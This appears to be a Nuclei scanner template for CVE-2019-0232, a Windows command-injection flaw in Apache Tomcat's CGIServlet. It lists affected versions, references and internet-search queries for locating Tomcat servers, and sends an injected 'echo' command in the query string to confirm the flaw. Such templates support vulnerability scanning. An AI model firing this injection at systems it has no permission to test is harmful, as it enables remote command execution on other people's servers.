id: CVE-2019-0232

info:
  name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
  author: DhiyaneshDk
  severity: high
  description: |
    When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
  reference:
    - http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
    - http://seclists.org/fulldisclosure/2019/May/4
    - https://access.redhat.com/errata/RHSA-2019:1712
    - https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
    - https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2019-0232
    cwe-id: CWE-78
    epss-score: 0.97373
    epss-percentile: 0.99927
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    vendor: apache
    product: tomcat
    shodan-query:
      - http.html:"apache tomcat"
      - http.title:"apache tomcat"
      - http.html:"jk status manager"
      - cpe:"cpe:2.3:a:apache:tomcat"
    fofa-query:
      - body="jk status manager"
      - body="apache tomcat"
      - title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2019,packetstorm,seclists,apache,tomcat

variables:
  sid: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        GET /?&echo+{{sid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{sid}}"

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 490a0046304402202f871ff28f38f687dbe3c61173834dbcae004d726e798d4018f0afa313de6bf002206a2b7627cb7f83fcd701389d836b5a07b68911aa84b6e18609bb6a717906a70c:922c64590222798bb761d5b6d8e72950